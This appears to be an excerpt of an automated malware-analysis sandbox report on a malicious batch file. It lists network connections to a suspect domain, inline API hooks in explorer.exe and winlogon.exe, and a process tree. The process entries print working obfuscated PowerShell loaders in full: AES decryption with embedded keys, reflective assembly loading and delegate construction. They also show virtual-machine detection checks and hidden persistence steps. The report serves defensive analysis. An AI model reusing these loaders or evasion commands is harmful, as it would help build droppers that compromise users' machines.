      Oct 4, 2024 05:25:24.475476027 CEST696950014192.64.119.55192.168.2.4
      Oct 4, 2024 05:25:24.475557089 CEST500146969192.168.2.4192.64.119.55
      Oct 4, 2024 05:25:24.476286888 CEST500146969192.168.2.4192.64.119.55
      Oct 4, 2024 05:25:24.481204987 CEST696950014192.64.119.55192.168.2.4
      Oct 4, 2024 05:25:45.838589907 CEST696950014192.64.119.55192.168.2.4
      Oct 4, 2024 05:25:45.838661909 CEST500146969192.168.2.4192.64.119.55
      Oct 4, 2024 05:25:53.649879932 CEST500146969192.168.2.4192.64.119.55
      Oct 4, 2024 05:25:53.655035973 CEST696950014192.64.119.55192.168.2.4
      TimestampSource PortDest PortSource IPDest IP
      Oct 4, 2024 05:24:35.063831091 CEST5271053192.168.2.41.1.1.1
      Oct 4, 2024 05:24:35.075117111 CEST53527101.1.1.1192.168.2.4
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Oct 4, 2024 05:24:35.063831091 CEST192.168.2.41.1.1.10x9d3dStandard query (0)azure-winsecure.comA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Oct 4, 2024 05:24:35.075117111 CEST1.1.1.1192.168.2.40x9d3dNo error (0)azure-winsecure.com192.64.119.55A (IP address)IN (0x0001)false

      Code Manipulations

      Function NameHook TypeActive in Processes
      ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
      NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
      ZwResumeThreadINLINEexplorer.exe, winlogon.exe
      NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
      ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
      NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
      NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
      ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
      ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
      NtResumeThreadINLINEexplorer.exe, winlogon.exe
      RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
      NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
      NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
      ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
      ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
      Function NameHook TypeNew Data
      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
      Function NameHook TypeNew Data
      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:23:23:21
      Start date:03/10/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
      Imagebase:0x7ff626e00000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:1
      Start time:23:23:21
      Start date:03/10/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:2
      Start time:23:23:22
      Start date:03/10/2024
      Path:C:\Windows\System32\wbem\WMIC.exe
      Wow64 process (32bit):false
      Commandline:wmic diskdrive get Model
      Imagebase:0x7ff6a0790000
      File size:576'000 bytes
      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:3
      Start time:23:23:22
      Start date:03/10/2024
      Path:C:\Windows\System32\findstr.exe
      Wow64 process (32bit):false
      Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
      Imagebase:0x7ff68e530000
      File size:36'352 bytes
      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:4
      Start time:23:23:22
      Start date:03/10/2024
      Path:C:\Windows\System32\wbem\WMIC.exe
      Wow64 process (32bit):false
      Commandline:wmic diskdrive get Manufacturer,Model
      Imagebase:0x7ff7699e0000
      File size:576'000 bytes
      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:5
      Start time:23:23:22
      Start date:03/10/2024
      Path:C:\Windows\System32\findstr.exe
      Wow64 process (32bit):false
      Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
      Imagebase:0x7ff68e530000
      File size:36'352 bytes
      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate
      Has exited:true

      Target ID:6
      Start time:23:23:24
      Start date:03/10/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
      Imagebase:0x7ff626e00000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:7
      Start time:23:23:24
      Start date:03/10/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:powershell.exe -WindowStyle Hidden
      Imagebase:0x7ff788560000
      File size:452'608 bytes
      MD5 hash:04029E121A0CFA5991749937DD22A1D9
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:10
      Start time:23:23:30
      Start date:03/10/2024
      Path:C:\Windows\System32\WerFault.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\WerFault.exe -u -p 3852 -s 2212
      Imagebase:0x7ff7758e0000
      File size:570'736 bytes
      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:14
      Start time:23:24:01
      Start date:03/10/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
      Imagebase:0x7ff626e00000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:15
      Start time:23:24:01
      Start date:03/10/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      Target ID:16
      Start time:23:24:01
      Start date:03/10/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
      Imagebase:0x7ff626e00000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:17
      Start time:23:24:01
      Start date:03/10/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:powershell.exe -WindowStyle Hidden
      Imagebase:0x7ff788560000
      File size:452'608 bytes
      MD5 hash:04029E121A0CFA5991749937DD22A1D9
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:18
      Start time:23:24:02
      Start date:03/10/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
      Imagebase:0x7ff626e00000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:19
      Start time:23:24:02
      Start date:03/10/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:20
      Start time:23:24:02
      Start date:03/10/2024
      Path:C:\Windows\System32\wbem\WMIC.exe
      Wow64 process (32bit):false
      Commandline:wmic diskdrive get Model
      Imagebase:0x7ff6a0790000
      File size:576'000 bytes
      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:21
      Start time:23:24:02
      Start date:03/10/2024
      Path:C:\Windows\System32\findstr.exe
      Wow64 process (32bit):false
      Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
      Imagebase:0x7ff68e530000
      File size:36'352 bytes
      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:22
      Start time:23:24:04
      Start date:03/10/2024
      Path:C:\Windows\System32\wbem\WMIC.exe
      Wow64 process (32bit):false
      Commandline:wmic diskdrive get Manufacturer,Model
      Imagebase:0x7ff6a0790000
      File size:576'000 bytes
      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:23
      Start time:23:24:04
      Start date:03/10/2024
      Path:C:\Windows\System32\findstr.exe
      Wow64 process (32bit):false
      Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
      Imagebase:0x7ff68e530000
      File size:36'352 bytes
      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:24
      Start time:23:24:22
      Start date:03/10/2024
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
      Imagebase:0x7ff626e00000
      File size:289'792 bytes
      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:25
      Start time:23:24:22
      Start date:03/10/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:powershell.exe -WindowStyle Hidden
      Imagebase:0x7ff788560000
      File size:452'608 bytes
      MD5 hash:04029E121A0CFA5991749937DD22A1D9
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:false

      Target ID:27
      Start time:23:24:27
      Start date:03/10/2024
      Path:C:\Windows\System32\WerFault.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\WerFault.exe -u -p 8184 -s 2036
      Imagebase:0x7ff7758e0000
      File size:570'736 bytes
      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:29
      Start time:23:24:32
      Start date:03/10/2024
      Path:C:\Windows\System32\WerFault.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\WerFault.exe -u -p 8184 -s 2248
      Imagebase:0x7ff7758e0000
      File size:570'736 bytes
      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:30
      Start time:23:24:32
      Start date:03/10/2024
      Path:C:\Windows\System32\schtasks.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
      Imagebase:0x7ff76f990000
      File size:235'008 bytes
      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:31
      Start time:23:24:32
      Start date:03/10/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:32
      Start time:23:24:34
      Start date:03/10/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
      Imagebase:0xf30000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:33
      Start time:23:24:34
      Start date:03/10/2024
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7699e0000
      File size:862'208 bytes
      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:34
      Start time:23:24:34
      Start date:03/10/2024
      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):true
      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
      Imagebase:0xf30000
      File size:433'152 bytes
      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Has exited:true

      Target ID:35
      Start time:23:24:34
      Start date:03/10/2024
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+'o'+'ds');$skqIwPbTYxVYhD=$ulnmlpDbsuVQN.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c,'+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SlSshRHzgoUjvXmeTqL=QuvobnauGMMc @([String])([IntPtr]);$KUNWcDgsbwBzyQuTTnSbbx=QuvobnauGMMc 